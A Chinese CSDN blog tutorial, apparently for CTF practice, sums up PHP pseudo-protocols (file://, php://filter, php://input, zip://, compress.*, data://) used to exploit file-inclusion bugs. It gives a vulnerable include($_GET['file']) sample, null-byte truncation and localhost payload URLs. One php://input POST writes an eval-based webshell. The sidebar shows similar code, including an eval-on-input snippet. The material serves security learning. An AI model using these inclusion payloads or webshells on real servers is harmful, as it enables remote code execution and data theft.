php伪协议详细总结

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量1.5k 收藏 10
点赞数 1
分类专栏: 安全学习 # web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45951598/article/details/110727454
版权

文章目录

php伪协议实现命令执行的七种姿势
PHP伪协议总结
在这里插入图片描述

0x01 是否截断问题

情况一:不需要截断:

http://127.0.0.1/test.php?file=file:///c:/users/Thinking/desktop/flag.txt

<?php

include($_GET['file'])

?>
情况二:需要截断:

在php版本<=5.2中进行测试是可以使用%00截断的。

http://127.0.0.1/test.php?file=file:///c:/users/Thinking/desktop/flag.txt%00


<?php

include($_GET['file'].'.php')

?>

0x02 allow_url_fopen与allow_url_include是否开启的问题:

PHP.ini:

file:// 协议在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响
在这里插入图片描述

使用方法:

file:// [文件的绝对路径和文件名]

http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WWW/phpcode.txt

【php://协议】

条件:

不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。

php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

参考自:http://php.net/manual/zh/wrappers.php.php#refsect2-wrappers.php-unknown-unknown-unknown-descriptioq

php://filter 读文件

读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

PHP.ini:

php://filter在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

在这里插入图片描述
测试现象:
http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php

在这里插入图片描述

php://input写文件

可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。

PHP.ini:

allow_url_fopen :off/on

allow_url_include:on
在这里插入图片描述
测试现象:

http://127.0.0.1/cmd.php?file=php://input

[POST DATA] <?php phpinfo()?>

也可以POST如下内容生成一句话: <?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"];?>');?>
在这里插入图片描述

【zip://, bzip2://, zlib://协议】

PHP.ini:

zip://, bzip2://, zlib://协议在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

zip://, bzip2://, zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名。

参考自:http://php.net/manual/zh/wrappers.compression.php

02 7.png
在这里插入图片描述

【zip://协议】

使用方法:

zip://archive.zip#dir/file.txt

zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]

测试现象:

http://127.0.0.1/cmd.php?file=zip://D:/soft/phpStudy/WWW/file.jpg%23phpcode.txt

先将要执行的PHP代码写好文件名为phpcode.txt,将phpcode.txt进行zip压缩,压缩文件名为file.zip,如果可以上传zip文件便直接上传,若不能便将file.zip重命名为file.jpg后在上传,其他几种压缩格式也可以这样操作。

由于#在get请求中会将后面的参数忽略所以使用get请求时候应进行url编码为%23,且此处经过测试相对路径是不可行,所以只能用绝对路径。
在这里插入图片描述

【bzip2://协议】

使用方法:

compress.bzip2://file.bz2

测试现象:

http://127.0.0.1/cmd.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg

or

http://127.0.0.1/cmd.php?file=compress.bzip2://./file.jpg

在这里插入图片描述

【zlib://协议】

使用方法:

compress.zlib://file.gz

测试现象:

http://127.0.0.1/cmd.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg

or

http://127.0.0.1/cmd.php?file=compress.zlib://./file.jpg
在这里插入图片描述

【data://协议】写入协议
php伪协议中的data通过通配符查找目录下的所有文件

url=data://text/plain,<?php print_r(glob("*")); ?>

经过测试官方文档上存在一处问题,经过测试PHP版本5.2,5.3,5.5,7.0;data:// 协议是是受限于allow_url_fopen的,官方文档上给出的是NO,所以要使用data://协议需要满足双on条件

PHP.ini:

data://协议必须双在on才能正常使用;

allow_url_fopen :on

allow_url_include:on

参考自:http://php.net/manual/zh/wrappers.data.php, 官方文档上allow_url_fopen应为yes。
在这里插入图片描述
测试现象:

http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>

or

http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

也可以:

http://127.0.0.1/cmd.php?file=data:text/plain,<?php phpinfo()?>

or

http://127.0.0.1/cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

在这里插入图片描述

multi4
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP 协议总结.docx
02-24
PHP 协议总结.docx
【每天学习一点新知识】文件包含常用之协议
RexHa的博客
02-06 3639
一些比较常用的php协议用法及部分演示过程
协议知识汇总
热门推荐
qq_21193587的博客
06-04 3万+
协议常常用于文件包含漏洞之中。 在 php 中能够造成文件包含的函数有 include、require、include_once、require_once、 highlight_file、show_source、file_get_contents、fopen、file、readfile 函数 include 函数 可以放在 PHP 脚本的任意位置,一般放在流程控制的处理部分中。当 PHP 脚本执行到 include 指定引入的文件时,才将它包含并尝试执行。这种方式可以把程序执行时的流程进行简单化。当第二次
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php协议、data协议、file协议)
最新发布
2401_84208172的博客
05-24 1223
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php协议、data协议、file协议),该题考察文件包含漏洞,涉及PHP协议data协议file协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
web安全——协议
永远相信美好的事情即将发生
02-06 1万+
协议常常用于文件包含漏洞之中。在php中能够造成文件包含的函数有include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile 函数 1.include函数 可以放在PHP脚本的任意位置,一般放在流程控制的处理部分中。当PHP脚本执行到include指定引入的文件时,才将它包含并尝试执行。这种方式可以把程序执行时的流程进行简单化。当第二次遇到相同文件时,PH
php协议 ctf,CTF中常用的php协议总结
weixin_42533910的博客
04-02 601
php:// — 访问各个输入/输出流(I/O streams)file:// — 访问本地文件系统phar:// — PHP 归档zlib:// — 压缩流data:// — 数据(RFC 2397)http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsglob:// — 查找匹配的文件路径模式ssh2:// — Secure Shell 2rar:// —...
协议利用
一只web狗
06-23 1653
PHP协议PHP带有很多内置URL风格的封装协议,可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。
解决CodeIgniter静态失效
11-03
总结来说,解决CodeIgniter静态失效的问题通常需要两步:一是正确配置Apache的`.htaccess`文件以实现URL重写,二是确保CodeIgniter的`uri_protocol`设置适应这种重写方式。在遇到类似问题时,检查和调整这两个方面...
IIS静态配置组件
10-22
2. 接受许可协议,按照向导指示进行安装。 3. 安装完成后,需要在IIS管理控制台中启用ISAPI筛选器,并添加ISAPI_Rewrite。 4. 创建httpd.ini或web.config文件,并编写URL重写规则。 5. 重启IIS服务,使更改生效。 *...
CTF知识总结,写的不错
10-29
- **PHP协议**:如`file://`,`data://`等,可以用于读取本地或远程资源,有时在文件包含漏洞中发挥作用。 - **弱类型**:PHP的弱类型可能导致类型转换问题,是安全漏洞的一个来源,如`==`与`===`的区别。 - **...
ctf总结.md
05-14
考虑php协议读取源码, 然后利用这一点,可以读取到你想获取的页面的源码例如: index.php,flag.php,login.php的源码,然后base64解密 url里?后面改成这个?file=...
Web安全之PHP协议漏洞利用,以及协议漏洞防护方法
Scalzdp的专栏
11-13 2081
单纯看协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用了协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
File Inclusion(文件包含漏洞)学习 / 协议
Goodric的博客
01-25 2462
file inclusion(文件包含漏洞) 在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 通过文件包含函数将文件包含进来,直接使用包含文件中的代码。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但有些时候,使用函数包含文件时,被包含的文件就设置为了函数的变量。 通过动态变量来引入需要包含的文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞。 通常文件包含
PHP协议
errorr0
03-13 6579
php协议,安全入门新手值得一看
协议总结
m0_62805300的博客
04-24 2062
php file://:访问本地文件系统。 http://localhost/test.php?file=file://C:\Windows\System32\drivers\etc\hosts php://访问各个输入输出流 php://input:将POST输入流当做PHP代码执行。 http://localhost/test.php?file=php://input POST:<?php phpinfo(); php://filter: 一种元封装器, 设计用于数
PHP 协议
m0_56107268的博客
11-08 5616
php协议
php协议
weixin_60719780的博客
01-27 4501
PHP协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
【网络安全 | CTF】攻防世界 Web_php_include【php协议|data协议|file协议
等风来
05-22 9653
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
四、文件包含漏洞[协议、读取文件、命令执行]
黑日里不灭的light
10-30 539
php://input:一般配合post输入,它提供了一种直接获取 POST 请求数据的方式,尤其适用于处理来自客户端的原始数据。php://filter:用于对流进行各种过滤或转换操作,允许你在读取或写入流数据之前对其进行处理。file://:用来访问本地文件。
php协议常用代码
08-05
常用的PHP协议代码包括: 1. 使用php://input执行PHP代码:这种方法可以通过将PHP代码作为POST数据传递,然后使用php://input协议来执行代码。例如,可以使用以下代码来执行phpinfo()函数并将结果输出到页面上: ``` <?php eval(file_get_contents('php://input')); ?> ``` 2. 使用php://filter读取源码:php://filter协议可以用于读取PHP源码。以下是一个示例代码,可以使用php://filter来读取文件中的PHP源码并输出到页面上: ``` <?php echo file_get_contents('php://filter/read=convert.base64-encode/resource=file.php'); ?> ``` 3. 使用php://filter绕过过滤器:有时候,某些代码会使用过滤器来过滤用户输入,以防止执行危险的操作。但是,可以使用php://filter协议来绕过这些过滤器。以下是一个示例代码,可以使用php://filter来绕过文件写入过滤器,并将内容写入指定文件: ``` <?php $content = '<?php exit; ?>'; $content .= $_POST['txt']; file_put_contents($_POST['filename'], $content); ?> ``` 需要注意的是,协议在一些环境中可能被禁用或限制,因此在编写代码时需要谨慎处理,并遵循安全最佳实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值